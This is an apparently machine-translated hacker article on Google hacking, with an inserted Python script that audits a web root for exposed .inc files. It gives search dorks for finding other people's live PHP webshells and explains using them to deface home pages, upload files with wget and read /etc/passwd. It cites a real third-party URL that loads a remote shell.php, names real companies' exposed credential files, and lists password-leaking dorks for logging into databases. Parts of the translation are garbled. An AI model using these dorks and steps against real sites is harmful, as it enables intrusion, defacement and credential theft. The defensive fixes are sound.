Google, you are so good
Article Source: PHACK Source: www.phack.org
GoogleHacking is the use of Google's search engine to find hosts with vulnerabilities and information containing sensitive data. The virus comes from the dock. To draw everyone's attention to GoogleHacking, we wrote this article in the hope that understanding the hacker's attack methods will help you better protect your information security. This article concentrates on understanding GoogleHacking attack methods; the details of some attacks are not described in depth.
Foreword: At the Blackhat conference held in Las Vegas, two security experts gave talks named "You Found That on Google" and "Google Attacks". Following the original post by WLJ on the Security Focus forum, I feel it is necessary to supplement some details. Today I'm telling you about another feature: using search engines to quickly find hosts with vulnerabilities and information that contains sensitive data, and even to carry out a direct, foolproof intrusion.
Using Google for a "penetration test": before implementing an attack we usually collect information, then confirm the vulnerability, and finally exploit it and expand the results. Here we will talk about two things: first, using Google to find hosts with a PHP webshell backdoor and testing whether it can be used; second, using Google to find exposed .inc sensitive information. OK, now we start.
1. Finding PHP webshells
We fill in Google's search box: intitle:"PHP shell *" "Enable stderr" filetype:php
(Note: intitle is the page title; "Enable stderr" refers to UNIX standard output and standard error; filetype is the file type.) In the search results you can find many webshells that execute commands directly on the machine. If you do not know how to use a PHP shell you have found, or are not familiar with UNIX, you can simply look at the listing; it is not detailed here, but there is a lot of use value.
To explain: the foreign PHP shells found by this search take UNIX commands, all of which are run through system calls (the same search can also be used in Baidu and other search engines; just fill in the search terms). In my test, this PHP webshell accepted echo (a common UNIX command) directly. In one line: echo "Summon" > index.jsp writes the text after echo, "Summon"; look at the homepage now and it has been changed to "Summon". We can also use wget to upload a file (such as the page you want to substitute). Then, in Execute Command, enter cat file > index.html, or echo "" > file followed by echo "test" >> file. In this way, the site's home page is replaced.
The same goes for uname -a; cat /etc/passwd. But note that some webshell programs have problems, such as: http://www.al3toof.com/card/smal ... c_html & command = http://ramsgaard.net/upload/shell.php, where PHP's global register (register_globals) is off.
Solution: we can use related tools to search the Internet ourselves; if information is being abused, go to http://www.google.com/remove.html to submit the information you want deleted, and control what search engine robots can query.
2. Searching for INC sensitive information
We fill in Google's search box: .org filetype:inc
We are now searching .org domain sites for .inc information (because Google blocks searching for "COM" information; we can also search other domains such as gov, cn, info, tw, jp, edu, etc.).
PS: I have seen that many PHP programmers like to put commonly used code or configuration information in an .inc file, such as shared.inc, global.inc, conn.inc, etc. Of course this is a good habit, and the official PHP website does the same, but I don't know whether you have noticed that there is a security hazard here. Once, when writing PHP code, I accidentally wrote a wrong statement. When I viewed this PHP file in the browser, I found that the screen showed in detail the path of the PHP file and the line of code. (PHP error display is enabled. This feature is on by default in PHP!) This means that when we inadvertently write wrong code (the same applies to an .inc file) while PHP error display is also on, the client's users will see the specific URL of the .inc file, and an .inc file is like TXT text: when browsed in the browser, its content is displayed without reservation. And many sites have written important information such as user passwords into .inc files!
This includes the domestic Haier and Jia Bell Motorcycle sites. I dare to announce this because I have tested it: the database ID and password in http://www.haier.com / su *** / inc / conn.inc cannot be used to connect from a client, since the website has closed port 1215 and the firewall also filters it. OK, with this knowledge of INC, we continue to search, find one that exposes a MySQL password, and use a client to log in and modify the data. Database knowledge is involved here, which we won't discuss much. That ends the discussion of "INC exposing sensitive information". We can solve it in a few ways:
1. You can configure how .inc files are handled so that their source cannot be obtained directly.
2. Of course, the better method is to change the file extension to .php (which PHP can parse), so that the client will not obtain the source file.
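A way to check your own web root for the exposure described above, as an added example (not code from the original article): it walks a directory and reports files that contain PHP code but whose extension PHP does not parse, marking those that also hold password-like assignments. The sample tree, its file contents and the assumption that only .php is handed to PHP are constructed for illustration.

```python
import os
import re
import tempfile

PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.I)
# Password-like assignment, e.g. $db_pass = "..." (heuristic, assumption).
CRED = re.compile(rb"(?i)(?:pass(?:word|wd)?|pwd|secret)\w*\s*=\s*['\"][^'\"]+['\"]")


def audit_docroot(docroot, parsed_exts=(".php",)):
    """Return sorted (relative_path, has_credentials) for exposed PHP source.

    parsed_exts: extensions the server hands to PHP (assumed: only .php).
    Any other file containing a PHP open tag is served as plain text.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(docroot):
        for name in files:
            if os.path.splitext(name)[1].lower() in parsed_exts:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read(1 << 20)  # first 1 MiB is enough for includes
            if PHP_TAG.search(data):
                rel = os.path.relpath(path, docroot).replace(os.sep, "/")
                findings.append((rel, bool(CRED.search(data))))
    return sorted(findings)


def build_sample_docroot(root):
    """Write a constructed sample tree (file names follow the article)."""
    files = {
        "index.php": '<?php include "inc/conn.inc"; ?>',
        "inc/conn.inc": '<?php $db_user = "web"; $db_pass = "example-only"; ?>',
        "inc/shared.inc": "<?php function h($s) { return htmlspecialchars($s); } ?>",
        "inc/global.inc.php": '<?php $db_pass = "example-only"; ?>',  # fix 2 applied
        "readme.txt": "static text, no PHP",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)


def demo():
    with tempfile.TemporaryDirectory() as root:
        build_sample_docroot(root)
        return audit_docroot(root)


if __name__ == "__main__":
    for rel, creds in demo():
        print(("CREDENTIALS  " if creds else "source only  ") + rel)
```

Every file it reports needs one of the two fixes listed above; global.inc.php in the sample is not reported because its final extension is one PHP parses.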
Here I present a picture drawn with FreeMind, with more information on Google Hack, to help us analyze step by step:
Connectors: - : . * |
Operators: "foo1 foo2", filetype:123, site:foo.com, intext:foo, intitle:footitle, allinurl:foo
Passwords:
"index of" htpasswd / passwd
filetype:xls username password email
"ws_ftp.log"
"config.php"
allinurl:admin mdb
service filetype:pwd (frontpage)
Sensitive information:
"robots.txt" "disallow:" filetype:txt
inurl:_vti_cnf (frontpage files)
allinurl:/msadc/samples/selector/showcode.asp
allinurl:/examples/jsp/snp/snoop.jsp
allinurl:phpsysinfo
ipsec filetype:conf
intitle:"error occurred" odbc request where (select|insert)
"Mydomain.com" Report Generated BY
End: If you want to get root permissions, you have to analyze the specific case, but having shell access is already good; there are many articles on taking a webshell further, which you can refer to. We can also find many useful things through Google, but the details have to be slowly analyzed, extended and applied to intrusion. I won't analyze these specifically. This gives everyone a line of thinking to study slowly. This article ends here. The purpose of writing it is to draw everyone's attention, to understand the new hack methods and to understand new protection methods. Things have two sides: today, with Google prevailing, while making full use of Google we should also look at it more comprehensively.